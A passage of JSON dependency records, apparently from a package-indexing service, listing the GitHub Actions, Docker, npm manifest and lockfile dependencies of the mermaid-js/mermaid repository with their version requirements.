{"id":14013837101,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013837102,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013837103,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release-publish.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:38.377Z","updated_at":"2023-09-29T07:57:38.377Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/release-publish.yml","dependencies":[{"id":14013837430,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013837431,"package_name":"fregante/setup-git-user","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013837810,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013837811,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/test.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:39.282Z","updated_at":"2023-09-29T07:57:39.282Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/test.yml","dependencies":[{"id":14013838060,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013838061,"package_name":"pnpm/action-setup","ecosystem":"actions","requirements":"v2","direct":true,"kind":"composite","optional":false},{"id":14013838062,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013838063,"package_name":"codecov/codecov-action","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/unlock-reopened-issues.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:40.500Z","updated_at":"2023-09-29T07:57:40.500Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/unlock-reopened-issues.yml","dependencies":[{"id":14013841054,"package_name":"Dunning-Kruger/unlock-issues","ecosystem":"actions","requirements":"v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/update-browserlist.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:44.680Z","updated_at":"2023-09-29T07:57:44.680Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/.github/workflows/update-browserlist.yml","dependencies":[{"id":14013843448,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":14013843449,"package_name":"EndBug/add-and-commit","ecosystem":"actions","requirements":"v9","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"docker","filepath":"docker-compose.yml","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:46.022Z","updated_at":"2023-09-29T07:57:46.022Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/docker-compose.yml","dependencies":[{"id":14013843778,"package_name":"node","ecosystem":"docker","requirements":"18.18.0-alpine3.18","direct":true,"kind":"runtime","optional":false},{"id":14013843779,"package_name":"cypress/included","ecosystem":"docker","requirements":"12.17.4","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"package.json","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:46.509Z","updated_at":"2023-09-29T07:57:46.509Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/package.json","dependencies":[{"id":14013844185,"package_name":"@applitools/eyes-cypress","ecosystem":"npm","requirements":"^3.33.1","direct":true,"kind":"development","optional":false},{"id":14013844267,"package_name":"@commitlint/cli","ecosystem":"npm","requirements":"^17.6.1","direct":true,"kind":"development","optional":false},{"id":14013844268,"package_name":"@commitlint/config-conventional","ecosystem":"npm","requirements":"^17.6.1","direct":true,"kind":"development","optional":false},{"id":14013844269,"package_name":"@cspell/eslint-plugin","ecosystem":"npm","requirements":"^6.31.1","direct":true,"kind":"development","optional":false},{"id":14013844274,"package_name":"@cypress/code-coverage","ecosystem":"npm","requirements":"^3.10.7","direct":true,"kind":"development","optional":false},{"id":14013844275,"package_name":"@rollup/plugin-typescript","ecosystem":"npm","requirements":"^11.1.1","direct":true,"kind":"development","optional":false},{"id":14013844276,"package_name":"@types/cors","ecosystem":"npm","requirements":"^2.8.13","direct":true,"kind":"development","optional":false},{"id":14013844277,"package_name":"@types/eslint","ecosystem":"npm","requirements":"^8.37.0","direct":true,"kind":"development","optional":false},{"id":14013844278,"package_name":"@types/express","ecosystem":"npm","requirements":"^4.17.17","direct":true,"kind":"development","optional":false},{"id":14013844279,"package_name":"@types/js-yaml","ecosystem":"npm","requirements":"^4.0.5","direct":true,"kind":"development","optional":false},{"id":14013844280,"package_name":"@types/jsdom","ecosystem":"npm","requirements":"^21.1.1","direct":true,"kind":"development","optional":false},{"id":14013844281,"package_name":"@types/lodash","ecosystem":"npm","requirements":"^4.14.194","direct":true,"kind":"development","optional":false},{"id":14013844282,"package_name":"@types/mdast","ecosystem":"npm","requirements":"^3.0.11","direct":true,"kind":"development","optional":false},{"id":14013844283,"package_name":"@types/node","ecosystem":"npm","requirements":"^18.16.0","direct":true,"kind":"development","optional":false},{"id":14013844284,"package_name":"@types/prettier","ecosystem":"npm","requirements":"^2.7.2","direct":true,"kind":"development","optional":false},{"id":14013844285,"package_name":"@types/rollup-plugin-visualizer","ecosystem":"npm","requirements":"^4.2.1","direct":true,"kind":"development","optional":false},{"id":14013844311,"package_name":"@typescript-eslint/eslint-plugin","ecosystem":"npm","requirements":"^6.7.2","direct":true,"kind":"development","optional":false},{"id":14013844312,"package_name":"@typescript-eslint/parser","ecosystem":"npm","requirements":"^6.7.2","direct":true,"kind":"development","optional":false},{"id":14013844313,"package_name":"@vitest/coverage-v8","ecosystem":"npm","requirements":"^0.34.0","direct":true,"kind":"development","optional":false},{"id":14013844314,"package_name":"@vitest/spy","ecosystem":"npm","requirements":"^0.34.0","direct":true,"kind":"development","optional":false},{"id":14013844315,"package_name":"@vitest/ui","ecosystem":"npm","requirements":"^0.34.0","direct":true,"kind":"development","optional":false},{"id":14013844316,"package_name":"ajv","ecosystem":"npm","requirements":"^8.12.0","direct":true,"kind":"development","optional":false},{"id":14013844317,"package_name":"concurrently","ecosystem":"npm","requirements":"^8.0.1","direct":true,"kind":"development","optional":false},{"id":14013844318,"package_name":"cors","ecosystem":"npm","requirements":"^2.8.5","direct":true,"kind":"development","optional":false},{"id":14013844319,"package_name":"cypress","ecosystem":"npm","requirements":"^12.10.0","direct":true,"kind":"development","optional":false},{"id":14013844320,"package_name":"cypress-image-snapshot","ecosystem":"npm","requirements":"^4.0.1","direct":true,"kind":"development","optional":false},{"id":14013844756,"package_name":"esbuild","ecosystem":"npm","requirements":"^0.19.0","direct":true,"kind":"development","optional":false},{"id":14013844757,"package_name":"eslint","ecosystem":"npm","requirements":"^8.39.0","direct":true,"kind":"development","optional":false},{"id":14013844758,"package_name":"eslint-config-prettier","ecosystem":"npm","requirements":"^8.8.0","direct":true,"kind":"development","optional":false},{"id":14013844759,"package_name":"eslint-plugin-cypress","ecosystem":"npm","requirements":"^2.13.2","direct":true,"kind":"development","optional":false},{"id":14013844760,"package_name":"eslint-plugin-html","ecosystem":"npm","requirements":"^7.1.0","direct":true,"kind":"development","optional":false},{"id":14013844761,"package_name":"eslint-plugin-jest","ecosystem":"npm","requirements":"^27.2.1","direct":true,"kind":"development","optional":false},{"id":14013844762,"package_name":"eslint-plugin-jsdoc","ecosystem":"npm","requirements":"^46.0.0","direct":true,"kind":"development","optional":false},{"id":14013844763,"package_name":"eslint-plugin-json","ecosystem":"npm","requirements":"^3.1.0","direct":true,"kind":"development","optional":false},{"id":14013844764,"package_name":"eslint-plugin-lodash","ecosystem":"npm","requirements":"^7.4.0","direct":true,"kind":"development","optional":false},{"id":14013844765,"package_name":"eslint-plugin-markdown","ecosystem":"npm","requirements":"^3.0.0","direct":true,"kind":"development","optional":false},{"id":14013844766,"package_name":"eslint-plugin-no-only-tests","ecosystem":"npm","requirements":"^3.1.0","direct":true,"kind":"development","optional":false},{"id":14013844767,"package_name":"eslint-plugin-tsdoc","ecosystem":"npm","requirements":"^0.2.17","direct":true,"kind":"development","optional":false},{"id":14013844768,"package_name":"eslint-plugin-unicorn","ecosystem":"npm","requirements":"^47.0.0","direct":true,"kind":"development","optional":false},{"id":14013844769,"package_name":"express","ecosystem":"npm","requirements":"^4.18.2","direct":true,"kind":"development","optional":false},{"id":14013844770,"package_name":"globby","ecosystem":"npm","requirements":"^13.1.4","direct":true,"kind":"development","optional":false},{"id":14013844771,"package_name":"husky","ecosystem":"npm","requirements":"^8.0.3","direct":true,"kind":"development","optional":false},{"id":14013844772,"package_name":"jest","ecosystem":"npm","requirements":"^29.5.0","direct":true,"kind":"development","optional":false},{"id":14013844773,"package_name":"jison","ecosystem":"npm","requirements":"^0.4.18","direct":true,"kind":"development","optional":false},{"id":14013844774,"package_name":"js-yaml","ecosystem":"npm","requirements":"^4.1.0","direct":true,"kind":"development","optional":false},{"id":14013844775,"package_name":"jsdom","ecosystem":"npm","requirements":"^22.0.0","direct":true,"kind":"development","optional":false},{"id":14013844776,"package_name":"lint-staged","ecosystem":"npm","requirements":"^13.2.1","direct":true,"kind":"development","optional":false},{"id":14013844777,"package_name":"nyc","ecosystem":"npm","requirements":"^15.1.0","direct":true,"kind":"development","optional":false},{"id":14013844778,"package_name":"path-browserify","ecosystem":"npm","requirements":"^1.0.1","direct":true,"kind":"development","optional":false},{"id":14013844779,"package_name":"pnpm","ecosystem":"npm","requirements":"^8.6.8","direct":true,"kind":"development","optional":false},{"id":14013844780,"package_name":"prettier","ecosystem":"npm","requirements":"^2.8.8","direct":true,"kind":"development","optional":false},{"id":14013844781,"package_name":"prettier-plugin-jsdoc","ecosystem":"npm","requirements":"^0.4.2","direct":true,"kind":"development","optional":false},{"id":14013844782,"package_name":"rimraf","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"development","optional":false},{"id":14013844783,"package_name":"rollup-plugin-visualizer","ecosystem":"npm","requirements":"^5.9.2","direct":true,"kind":"development","optional":false},{"id":14013844784,"package_name":"start-server-and-test","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"development","optional":false},{"id":14013844785,"package_name":"ts-node","ecosystem":"npm","requirements":"^10.9.1","direct":true,"kind":"development","optional":false},{"id":14013844786,"package_name":"typescript","ecosystem":"npm","requirements":"^5.1.3","direct":true,"kind":"development","optional":false},{"id":14013844787,"package_name":"vite","ecosystem":"npm","requirements":"^4.3.9","direct":true,"kind":"development","optional":false},{"id":14013844788,"package_name":"vite-plugin-istanbul","ecosystem":"npm","requirements":"^4.1.0","direct":true,"kind":"development","optional":false},{"id":14013844808,"package_name":"vitest","ecosystem":"npm","requirements":"^0.34.0","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/mermaid/package.json","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:49.146Z","updated_at":"2023-09-29T07:57:49.146Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/packages/mermaid/package.json","dependencies":[{"id":14013845319,"package_name":"@braintree/sanitize-url","ecosystem":"npm","requirements":"^6.0.1","direct":true,"kind":"runtime","optional":false},{"id":14013845326,"package_name":"@types/d3-scale","ecosystem":"npm","requirements":"^4.0.3","direct":true,"kind":"runtime","optional":false},{"id":14013845330,"package_name":"@types/d3-scale-chromatic","ecosystem":"npm","requirements":"^3.0.0","direct":true,"kind":"runtime","optional":false},{"id":14013845336,"package_name":"cytoscape","ecosystem":"npm","requirements":"^3.23.0","direct":true,"kind":"runtime","optional":false},{"id":14013845338,"package_name":"cytoscape-cose-bilkent","ecosystem":"npm","requirements":"^4.1.0","direct":true,"kind":"runtime","optional":false},{"id":14013845342,"package_name":"cytoscape-fcose","ecosystem":"npm","requirements":"^2.1.0","direct":true,"kind":"runtime","optional":false},{"id":14013845344,"package_name":"d3","ecosystem":"npm","requirements":"^7.4.0","direct":true,"kind":"runtime","optional":false},{"id":14013845346,"package_name":"d3-sankey","ecosystem":"npm","requirements":"^0.12.3","direct":true,"kind":"runtime","optional":false},{"id":14013845348,"package_name":"dagre-d3-es","ecosystem":"npm","requirements":"7.0.10","direct":true,"kind":"runtime","optional":false},{"id":14013845350,"package_name":"dayjs","ecosystem":"npm","requirements":"^1.11.7","direct":true,"kind":"runtime","optional":false},{"id":14013845353,"package_name":"dompurify","ecosystem":"npm","requirements":"^3.0.5","direct":true,"kind":"runtime","optional":false},{"id":14013845355,"package_name":"elkjs","ecosystem":"npm","requirements":"^0.8.2","direct":true,"kind":"runtime","optional":false},{"id":14013845357,"package_name":"khroma","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":14013845360,"package_name":"lodash-es","ecosystem":"npm","requirements":"^4.17.21","direct":true,"kind":"runtime","optional":false},{"id":14013845362,"package_name":"mdast-util-from-markdown","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"runtime","optional":false},{"id":14013845364,"package_name":"non-layered-tidy-tree-layout","ecosystem":"npm","requirements":"^2.0.2","direct":true,"kind":"runtime","optional":false},{"id":14013845367,"package_name":"stylis","ecosystem":"npm","requirements":"^4.1.3","direct":true,"kind":"runtime","optional":false},{"id":14013845369,"package_name":"ts-dedent","ecosystem":"npm","requirements":"^2.2.0","direct":true,"kind":"runtime","optional":false},{"id":14013845372,"package_name":"uuid","ecosystem":"npm","requirements":"^9.0.0","direct":true,"kind":"runtime","optional":false},{"id":14013845375,"package_name":"web-worker","ecosystem":"npm","requirements":"^1.2.0","direct":true,"kind":"runtime","optional":false},{"id":14013845377,"package_name":"@adobe/jsonschema2md","ecosystem":"npm","requirements":"^7.1.4","direct":true,"kind":"development","optional":false},{"id":14013845681,"package_name":"@types/cytoscape","ecosystem":"npm","requirements":"^3.19.9","direct":true,"kind":"development","optional":false},{"id":14013845682,"package_name":"@types/d3","ecosystem":"npm","requirements":"^7.4.0","direct":true,"kind":"development","optional":false},{"id":14013845683,"package_name":"@types/d3-sankey","ecosystem":"npm","requirements":"^0.12.1","direct":true,"kind":"development","optional":false},{"id":14013845826,"package_name":"@types/d3-scale","ecosystem":"npm","requirements":"^4.0.3","direct":true,"kind":"development","optional":false},{"id":14013845827,"package_name":"@types/d3-selection","ecosystem":"npm","requirements":"^3.0.5","direct":true,"kind":"development","optional":false},{"id":14013845828,"package_name":"@types/d3-shape","ecosystem":"npm","requirements":"^3.1.1","direct":true,"kind":"development","optional":false},{"id":14013845829,"package_name":"@types/dompurify","ecosystem":"npm","requirements":"^3.0.2","direct":true,"kind":"development","optional":false},{"id":14013845830,"package_name":"@types/jsdom","ecosystem":"npm","requirements":"^21.1.1","direct":true,"kind":"development","optional":false},{"id":14013845831,"package_name":"@types/lodash-es","ecosystem":"npm","requirements":"^4.17.7","direct":true,"kind":"development","optional":false},{"id":14013845832,"package_name":"@types/micromatch","ecosystem":"npm","requirements":"^4.0.2","direct":true,"kind":"development","optional":false},{"id":14013845833,"package_name":"@types/prettier","ecosystem":"npm","requirements":"^2.7.2","direct":true,"kind":"development","optional":false},{"id":14013845834,"package_name":"@types/stylis","ecosystem":"npm","requirements":"^4.0.2","direct":true,"kind":"development","optional":false},{"id":14013845835,"package_name":"@types/uuid","ecosystem":"npm","requirements":"^9.0.1","direct":true,"kind":"development","optional":false},{"id":14013845836,"package_name":"@typescript-eslint/eslint-plugin","ecosystem":"npm","requirements":"^5.59.0","direct":true,"kind":"development","optional":false},{"id":14013845837,"package_name":"@typescript-eslint/parser","ecosystem":"npm","requirements":"^5.59.0","direct":true,"kind":"development","optional":false},{"id":14013845838,"package_name":"ajv","ecosystem":"npm","requirements":"^8.11.2","direct":true,"kind":"development","optional":false},{"id":14013845839,"package_name":"chokidar","ecosystem":"npm","requirements":"^3.5.3","direct":true,"kind":"development","optional":false},{"id":14013845840,"package_name":"concurrently","ecosystem":"npm","requirements":"^8.0.1","direct":true,"kind":"development","optional":false},{"id":14013845841,"package_name":"cpy-cli","ecosystem":"npm","requirements":"^4.2.0","direct":true,"kind":"development","optional":false},{"id":14013845842,"package_name":"cspell","ecosystem":"npm","requirements":"^6.31.1","direct":true,"kind":"development","optional":false},{"id":14013845843,"package_name":"csstree-validator","ecosystem":"npm","requirements":"^3.0.0","direct":true,"kind":"development","optional":false},{"id":14013845847,"package_name":"globby","ecosystem":"npm","requirements":"^13.1.4","direct":true,"kind":"development","optional":false},{"id":14013845848,"package_name":"jison","ecosystem":"npm","requirements":"^0.4.18","direct":true,"kind":"development","optional":false},{"id":14013845849,"package_name":"js-base64","ecosystem":"npm","requirements":"^3.7.5","direct":true,"kind":"development","optional":false},{"id":14013845850,"package_name":"jsdom","ecosystem":"npm","requirements":"^22.0.0","direct":true,"kind":"development","optional":false},{"id":14013845851,"package_name":"json-schema-to-typescript","ecosystem":"npm","requirements":"^11.0.3","direct":true,"kind":"development","optional":false},{"id":14013845852,"package_name":"micromatch","ecosystem":"npm","requirements":"^4.0.5","direct":true,"kind":"development","optional":false},{"id":14013845853,"package_name":"path-browserify","ecosystem":"npm","requirements":"^1.0.1","direct":true,"kind":"development","optional":false},{"id":14013845854,"package_name":"prettier","ecosystem":"npm","requirements":"^2.8.8","direct":true,"kind":"development","optional":false},{"id":14013845855,"package_name":"remark","ecosystem":"npm","requirements":"^14.0.2","direct":true,"kind":"development","optional":false},{"id":14013845856,"package_name":"remark-frontmatter","ecosystem":"npm","requirements":"^4.0.1","direct":true,"kind":"development","optional":false},{"id":14013845857,"package_name":"remark-gfm","ecosystem":"npm","requirements":"^3.0.1","direct":true,"kind":"development","optional":false},{"id":14013845858,"package_name":"rimraf","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"development","optional":false},{"id":14013845859,"package_name":"start-server-and-test","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"development","optional":false},{"id":14013845860,"package_name":"type-fest","ecosystem":"npm","requirements":"^4.1.0","direct":true,"kind":"development","optional":false},{"id":14013845861,"package_name":"typedoc","ecosystem":"npm","requirements":"^0.25.0","direct":true,"kind":"development","optional":false},{"id":14013845862,"package_name":"typedoc-plugin-markdown","ecosystem":"npm","requirements":"^3.15.2","direct":true,"kind":"development","optional":false},{"id":14013845863,"package_name":"typescript","ecosystem":"npm","requirements":"^5.0.4","direct":true,"kind":"development","optional":false},{"id":14013845864,"package_name":"unist-util-flatmap","ecosystem":"npm","requirements":"^1.0.0","direct":true,"kind":"development","optional":false},{"id":14013845937,"package_name":"unist-util-visit","ecosystem":"npm","requirements":"^4.1.2","direct":true,"kind":"development","optional":false},{"id":14013845938,"package_name":"vitepress","ecosystem":"npm","requirements":"^1.0.0-alpha.72","direct":true,"kind":"development","optional":false},{"id":14013845939,"package_name":"vitepress-plugin-search","ecosystem":"npm","requirements":"^1.0.4-alpha.20","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/mermaid/src/docs/package.json","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:51.866Z","updated_at":"2023-09-29T07:57:51.866Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/packages/mermaid/src/docs/package.json","dependencies":[{"id":14013846720,"package_name":"@vueuse/core","ecosystem":"npm","requirements":"^10.1.0","direct":true,"kind":"runtime","optional":false},{"id":14013846721,"package_name":"jiti","ecosystem":"npm","requirements":"^1.18.2","direct":true,"kind":"runtime","optional":false},{"id":14013846722,"package_name":"vue","ecosystem":"npm","requirements":"^3.3","direct":true,"kind":"runtime","optional":false},{"id":14013846723,"package_name":"mermaid","ecosystem":"npm","requirements":"workspace:^","direct":true,"kind":"runtime","optional":false},{"id":14013846724,"package_name":"@iconify-json/carbon","ecosystem":"npm","requirements":"^1.1.16","direct":true,"kind":"development","optional":false},{"id":14013846725,"package_name":"@unocss/reset","ecosystem":"npm","requirements":"^0.56.0","direct":true,"kind":"development","optional":false},{"id":14013846726,"package_name":"@vite-pwa/vitepress","ecosystem":"npm","requirements":"^0.2.0","direct":true,"kind":"development","optional":false},{"id":14013846756,"package_name":"@vitejs/plugin-vue","ecosystem":"npm","requirements":"^4.2.1","direct":true,"kind":"development","optional":false},{"id":14013846757,"package_name":"fast-glob","ecosystem":"npm","requirements":"^3.2.12","direct":true,"kind":"development","optional":false},{"id":14013846758,"package_name":"https-localhost","ecosystem":"npm","requirements":"^4.7.1","direct":true,"kind":"development","optional":false},{"id":14013846788,"package_name":"pathe","ecosystem":"npm","requirements":"^1.1.0","direct":true,"kind":"development","optional":false},{"id":14013846789,"package_name":"unocss","ecosystem":"npm","requirements":"^0.56.0","direct":true,"kind":"development","optional":false},{"id":14013846790,"package_name":"unplugin-vue-components","ecosystem":"npm","requirements":"^0.25.0","direct":true,"kind":"development","optional":false},{"id":14013846791,"package_name":"vite","ecosystem":"npm","requirements":"^4.3.9","direct":true,"kind":"development","optional":false},{"id":14013846792,"package_name":"vite-plugin-pwa","ecosystem":"npm","requirements":"^0.16.0","direct":true,"kind":"development","optional":false},{"id":14013846793,"package_name":"vitepress","ecosystem":"npm","requirements":"1.0.0-rc.20","direct":true,"kind":"development","optional":false},{"id":14013846794,"package_name":"workbox-window","ecosystem":"npm","requirements":"^7.0.0","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/mermaid-example-diagram/package.json","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:53.269Z","updated_at":"2023-09-29T07:57:53.269Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/packages/mermaid-example-diagram/package.json","dependencies":[{"id":14013847051,"package_name":"@braintree/sanitize-url","ecosystem":"npm","requirements":"^6.0.1","direct":true,"kind":"runtime","optional":false},{"id":14013847052,"package_name":"cytoscape","ecosystem":"npm","requirements":"^3.23.0","direct":true,"kind":"runtime","optional":false},{"id":14013847053,"package_name":"cytoscape-cose-bilkent","ecosystem":"npm","requirements":"^4.1.0","direct":true,"kind":"runtime","optional":false},{"id":14013847054,"package_name":"cytoscape-fcose","ecosystem":"npm","requirements":"^2.1.0","direct":true,"kind":"runtime","optional":false},{"id":14013847055,"package_name":"d3","ecosystem":"npm","requirements":"^7.0.0","direct":true,"kind":"runtime","optional":false},{"id":14013847056,"package_name":"khroma","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":14013847057,"package_name":"non-layered-tidy-tree-layout","ecosystem":"npm","requirements":"^2.0.2","direct":true,"kind":"runtime","optional":false},{"id":14013847058,"package_name":"@types/cytoscape","ecosystem":"npm","requirements":"^3.19.9","direct":true,"kind":"development","optional":false},{"id":14013847059,"package_name":"concurrently","ecosystem":"npm","requirements":"^8.0.0","direct":true,"kind":"development","optional":false},{"id":14013847060,"package_name":"rimraf","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"development","optional":false},{"id":14013847061,"package_name":"mermaid","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/mermaid-zenuml/package.json","sha":null,"kind":"manifest","created_at":"2023-09-29T07:57:54.573Z","updated_at":"2023-09-29T07:57:54.573Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/packages/mermaid-zenuml/package.json","dependencies":[{"id":14013847122,"package_name":"@zenuml/core","ecosystem":"npm","requirements":"^3.0.6","direct":true,"kind":"runtime","optional":false},{"id":14013847266,"package_name":"mermaid","ecosystem":"npm","requirements":"workspace:^","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"pnpm-lock.yaml","sha":null,"kind":"lockfile","created_at":"2023-09-29T07:57:55.425Z","updated_at":"2023-09-29T07:57:55.425Z","repository_link":"https://github.com/mermaid-js/mermaid/blob/develop/pnpm-lock.yaml","dependencies":[{"id":14013847336,"package_name":"@adobe","ecosystem":"npm","requirements":"helix-log@6.0.0","direct":false,"kind":"development","optional":false},{"id":14013847337,"package_name":"@adobe","ecosystem":"npm","requirements":"jsonschema2md@7.1.4","direct":false,"kind":"development","optional":false},{"id":14013847338,"package_name":"@algolia","ecosystem":"npm","requirements":"autocomplete-core@1.8.2","direct":false,"kind":"development","optional":false},{"id":14013847339,"package_name":"@algolia","ecosystem":"npm","requirements":"autocomplete-core@1.9.3(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847340,"package_name":"@algolia","ecosystem":"npm","requirements":"autocomplete-plugin-algolia-insights@1.9.3(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847341,"package_name":"@algolia","ecosystem":"npm","requirements":"autocomplete-preset-algolia@1.8.2(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847342,"package_name":"@algolia","ecosystem":"npm","requirements":"autocomplete-preset-algolia@1.9.3(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847343,"package_name":"@algolia","ecosystem":"npm","requirements":"autocomplete-shared@1.8.2","direct":false,"kind":"development","optional":false},{"id":14013847344,"package_name":"@algolia","ecosystem":"npm","requirements":"autocomplete-shared@1.9.3(@algolia","direct":false,"kind":"development","optional":false},{"id":14013847345,"package_name":"@algolia","ecosystem":"npm","requirements":"cache-browser-local-storage@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847346,"package_name":"@algolia","ecosystem":"npm","requirements":"cache-browser-local-storage@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847347,"package_name":"@algolia","ecosystem":"npm","requirements":"cache-common@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847348,"package_name":"@algolia","ecosystem":"npm","requirements":"cache-common@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847349,"package_name":"@algolia","ecosystem":"npm","requirements":"cache-in-memory@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847350,"package_name":"@algolia","ecosystem":"npm","requirements":"cache-in-memory@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847351,"package_name":"@algolia","ecosystem":"npm","requirements":"client-account@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847352,"package_name":"@algolia","ecosystem":"npm","requirements":"client-account@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847353,"package_name":"@algolia","ecosystem":"npm","requirements":"client-analytics@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847354,"package_name":"@algolia","ecosystem":"npm","requirements":"client-analytics@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847355,"package_name":"@algolia","ecosystem":"npm","requirements":"client-common@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847356,"package_name":"@algolia","ecosystem":"npm","requirements":"client-common@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847357,"package_name":"@algolia","ecosystem":"npm","requirements":"client-personalization@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847358,"package_name":"@algolia","ecosystem":"npm","requirements":"client-personalization@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847359,"package_name":"@algolia","ecosystem":"npm","requirements":"client-search@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847360,"package_name":"@algolia","ecosystem":"npm","requirements":"client-search@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847361,"package_name":"@algolia","ecosystem":"npm","requirements":"logger-common@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847362,"package_name":"@algolia","ecosystem":"npm","requirements":"logger-common@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847363,"package_name":"@algolia","ecosystem":"npm","requirements":"logger-console@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847364,"package_name":"@algolia","ecosystem":"npm","requirements":"logger-console@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847365,"package_name":"@algolia","ecosystem":"npm","requirements":"requester-browser-xhr@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847366,"package_name":"@algolia","ecosystem":"npm","requirements":"requester-browser-xhr@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847367,"package_name":"@algolia","ecosystem":"npm","requirements":"requester-common@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847368,"package_name":"@algolia","ecosystem":"npm","requirements":"requester-common@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847369,"package_name":"@algolia","ecosystem":"npm","requirements":"requester-node-http@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847370,"package_name":"@algolia","ecosystem":"npm","requirements":"requester-node-http@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847371,"package_name":"@algolia","ecosystem":"npm","requirements":"transporter@4.14.2","direct":false,"kind":"development","optional":false},{"id":14013847372,"package_name":"@algolia","ecosystem":"npm","requirements":"transporter@4.19.1","direct":false,"kind":"development","optional":false},{"id":14013847373,"package_name":"@alloc","ecosystem":"npm","requirements":"quick-lru@5.2.0","direct":false,"kind":"runtime","optional":false},{"id":14013847374,"package_name":"@ampproject","ecosystem":"npm","requirements":"remapping@2.2.1","direct":false,"kind":"development","optional":false},{"id":14013847375,"package_name":"@antfu","ecosystem":"npm","requirements":"install-pkg@0.1.1","direct":false,"kind":"development","optional":false},{"id":14013847376,"package_name":"@antfu","ecosystem":"npm","requirements":"utils@0.7.5","direct":false,"kind":"development","optional":false},{"id":14013847377,"package_name":"@apideck","ecosystem":"npm","requirements":"better-ajv-errors@0.3.6(ajv@8.12.0)","direct":false,"kind":"development","optional":false},{"id":14013847378,"package_name":"@applitools","ecosystem":"npm","requirements":"core-base@1.1.56","direct":false,"kind":"development","optional":false},{"id":14013847505,"package_name":"@applitools","ecosystem":"npm","requirements":"core@3.2.1(typescript@5.1.3)","direct":false,"kind":"development","optional":false},{"id":14013847506,"package_name":"@applitools","ecosystem":"npm","requirements":"dom-capture@11.2.2","direct":false,"kind":